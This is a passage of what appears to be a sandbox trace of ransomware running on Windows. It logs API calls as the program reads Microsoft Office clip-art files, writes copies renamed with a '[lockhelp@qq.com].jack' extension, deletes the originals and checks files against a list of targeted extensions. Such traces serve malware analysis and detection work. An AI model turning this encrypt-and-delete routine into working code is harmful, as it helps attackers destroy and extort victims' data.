Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0209.722] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.722] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0209.722] GetLastError () returned 0x0 [0209.722] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x296f, lpOverlapped=0x0) returned 1 [0209.904] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x2970, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x2970, lpOverlapped=0x0) returned 1 [0209.905] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0209.905] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xec, lpOverlapped=0x0) returned 1 [0209.905] SetEndOfFile (hFile=0x43c) returned 1 [0209.905] CloseHandle (hObject=0x43c) returned 1 [0209.907] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.908] SetEndOfFile (hFile=0x3d4) returned 1 [0209.908] CloseHandle (hObject=0x3d4) returned 1 [0209.908] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0209.909] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif")) returned 1 [0209.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0209.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0209.909] lstrlenW (lpString=".doc") returned 4 [0209.909] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.909] lstrlenW (lpString=".docx") returned 5 [0209.909] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.909] lstrlenW (lpString=".pdf") returned 4 [0209.909] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.909] lstrlenW (lpString=".xls") returned 4 [0209.909] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.909] lstrlenW (lpString=".xlsx") returned 5 [0209.909] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.909] lstrlenW (lpString=".ppt") returned 4 [0209.909] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0209.909] lstrlenW (lpString=".zip") returned 4 [0209.909] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.909] lstrlenW (lpString=".rar") returned 4 [0209.909] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.909] lstrlenW (lpString=".bz2") returned 4 [0209.910] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.910] lstrlenW (lpString=".7z") returned 3 [0209.910] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0209.910] lstrlenW (lpString=".dbf") returned 4 [0209.910] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0209.912] lstrlenW (lpString=".1cd") returned 4 [0209.912] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0209.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0209.912] lstrlenW (lpString=".jpg") returned 4 [0209.912] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0209.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0209.912] lstrlenW (lpString=".doc") returned 4 [0209.912] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.912] lstrlenW (lpString=".docx") returned 5 [0209.912] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.912] lstrlenW (lpString=".pdf") returned 4 [0209.912] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.912] lstrlenW (lpString=".xls") returned 4 [0209.912] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.912] lstrlenW (lpString=".xlsx") returned 5 [0209.912] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.912] lstrlenW (lpString=".ppt") returned 4 [0209.912] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0209.912] lstrlenW (lpString=".zip") returned 4 [0209.912] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.912] lstrlenW (lpString=".rar") returned 4 [0209.912] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.912] lstrlenW (lpString=".bz2") returned 4 [0209.912] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.912] lstrlenW (lpString=".7z") returned 3 [0209.913] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0209.913] lstrlenW (lpString=".dbf") returned 4 [0209.913] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0209.913] lstrlenW (lpString=".1cd") returned 4 [0209.913] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0209.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0209.913] lstrlenW (lpString=".jpg") returned 4 [0209.913] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.913] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0209.913] lstrlenW (lpString="AG00157_.GIF") returned 12 [0209.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0210.264] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=4955) returned 1 [0210.264] CloseHandle (hObject=0x3f4) returned 1 [0210.264] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif")) returned 0x220 [0210.264] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0210.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0210.596] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0210.596] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0210.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0210.599] GetLastError () returned 0x0 [0210.599] ReadFile (in: hFile=0x3f4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x135b, lpOverlapped=0x0) returned 1 [0211.608] WriteFile (in: hFile=0x41c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x1360, lpOverlapped=0x0) returned 1 [0211.609] ReadFile (in: hFile=0x3f4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0211.609] WriteFile (in: hFile=0x41c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xec, lpOverlapped=0x0) returned 1 [0211.609] SetEndOfFile (hFile=0x41c) returned 1 [0211.609] CloseHandle (hObject=0x41c) returned 1 [0211.610] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0211.610] SetEndOfFile (hFile=0x3f4) returned 1 [0211.611] CloseHandle (hObject=0x3f4) returned 1 [0211.611] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0211.611] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif")) returned 1 [0211.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0211.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0211.612] lstrlenW (lpString=".doc") returned 4 [0211.612] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0211.612] lstrlenW (lpString=".docx") returned 5 [0211.612] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0211.612] lstrlenW (lpString=".pdf") returned 4 [0211.612] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0211.612] lstrlenW (lpString=".xls") returned 4 [0211.612] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0211.612] lstrlenW (lpString=".xlsx") returned 5 [0211.612] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0211.612] lstrlenW (lpString=".ppt") returned 4 [0211.612] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0211.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0211.612] lstrlenW (lpString=".zip") returned 4 [0211.612] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0211.612] lstrlenW (lpString=".rar") returned 4 [0211.612] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0211.612] lstrlenW (lpString=".bz2") returned 4 [0211.612] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0211.612] lstrlenW (lpString=".7z") returned 3 [0211.612] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0211.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0211.612] lstrlenW (lpString=".dbf") returned 4 [0211.612] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0211.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0211.612] lstrlenW (lpString=".1cd") returned 4 [0211.612] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0211.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0211.612] lstrlenW (lpString=".jpg") returned 4 [0211.612] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0211.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0211.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0211.613] lstrlenW (lpString=".doc") returned 4 [0211.613] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0211.613] lstrlenW (lpString=".docx") returned 5 [0211.613] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0211.613] lstrlenW (lpString=".pdf") returned 4 [0211.613] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0211.613] lstrlenW (lpString=".xls") returned 4 [0211.613] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0211.613] lstrlenW (lpString=".xlsx") returned 5 [0211.613] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0211.613] lstrlenW (lpString=".ppt") returned 4 [0211.613] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0211.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0211.613] lstrlenW (lpString=".zip") returned 4 [0211.613] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0211.613] lstrlenW (lpString=".rar") returned 4 [0211.613] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0211.613] lstrlenW (lpString=".bz2") returned 4 [0211.613] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0211.613] lstrlenW (lpString=".7z") returned 3 [0211.613] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0211.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0211.613] lstrlenW (lpString=".dbf") returned 4 [0211.613] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0211.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0211.613] lstrlenW (lpString=".1cd") returned 4 [0211.613] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0211.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0211.613] lstrlenW (lpString=".jpg") returned 4 [0211.613] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0211.613] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0211.613] lstrlenW (lpString="AG00165_.GIF") returned 12 [0211.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0214.855] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=8582) returned 1 [0214.855] CloseHandle (hObject=0x40c) returned 1 [0214.855] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif")) returned 0x220 [0214.855] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0214.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0214.856] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0214.856] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0214.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0214.857] GetLastError () returned 0x0 [0214.857] ReadFile (in: hFile=0x40c, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x2186, lpOverlapped=0x0) returned 1 [0215.671] WriteFile (in: hFile=0x3ec, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x2190, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x2190, lpOverlapped=0x0) returned 1 [0215.672] ReadFile (in: hFile=0x40c, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0215.672] WriteFile (in: hFile=0x3ec, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xec, lpOverlapped=0x0) returned 1 [0215.672] SetEndOfFile (hFile=0x3ec) returned 1 [0215.673] CloseHandle (hObject=0x3ec) returned 1 [0215.673] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0215.673] SetEndOfFile (hFile=0x40c) returned 1 [0215.674] CloseHandle (hObject=0x40c) returned 1 [0215.674] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0215.675] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif")) returned 1 [0219.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0219.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0219.555] lstrlenW (lpString=".doc") returned 4 [0219.555] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0219.555] lstrlenW (lpString=".docx") returned 5 [0219.555] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0219.555] lstrlenW (lpString=".pdf") returned 4 [0219.555] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0219.555] lstrlenW (lpString=".xls") returned 4 [0219.555] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0219.555] lstrlenW (lpString=".xlsx") returned 5 [0219.555] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0219.555] lstrlenW (lpString=".ppt") returned 4 [0219.555] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0219.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0219.555] lstrlenW (lpString=".zip") returned 4 [0219.555] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0219.555] lstrlenW (lpString=".rar") returned 4 [0219.556] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0219.556] lstrlenW (lpString=".bz2") returned 4 [0219.556] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0219.556] lstrlenW (lpString=".7z") returned 3 [0219.556] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0219.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0219.556] lstrlenW (lpString=".dbf") returned 4 [0219.556] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0219.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0219.556] lstrlenW (lpString=".1cd") returned 4 [0219.556] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0219.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0219.556] lstrlenW (lpString=".jpg") returned 4 [0219.556] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0219.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0219.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0219.556] lstrlenW (lpString=".doc") returned 4 [0219.556] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0219.556] lstrlenW (lpString=".docx") returned 5 [0219.556] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0219.556] lstrlenW (lpString=".pdf") returned 4 [0219.556] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0219.556] lstrlenW (lpString=".xls") returned 4 [0219.556] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0219.556] lstrlenW (lpString=".xlsx") returned 5 [0219.556] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0219.557] lstrlenW (lpString=".ppt") returned 4 [0219.557] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0219.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0219.557] lstrlenW (lpString=".zip") returned 4 [0219.557] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0219.557] lstrlenW (lpString=".rar") returned 4 [0219.557] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0219.557] lstrlenW (lpString=".bz2") returned 4 [0219.557] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0219.557] lstrlenW (lpString=".7z") returned 3 [0219.557] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0219.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0219.557] lstrlenW (lpString=".dbf") returned 4 [0219.557] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0219.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0219.557] lstrlenW (lpString=".1cd") returned 4 [0219.557] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0219.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0219.557] lstrlenW (lpString=".jpg") returned 4 [0219.557] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0219.557] lstrcmpiW (lpString1=".WMF", lpString2=".jack") returned 1 [0219.557] lstrlenW (lpString="AN00015_.WMF") returned 12 [0219.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0219.558] GetFileSizeEx (in: hFile=0x424, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=4734) returned 1 [0219.558] CloseHandle (hObject=0x424) returned 1 [0219.558] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf")) returned 0x220 [0219.558] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0219.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0219.558] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0219.558] 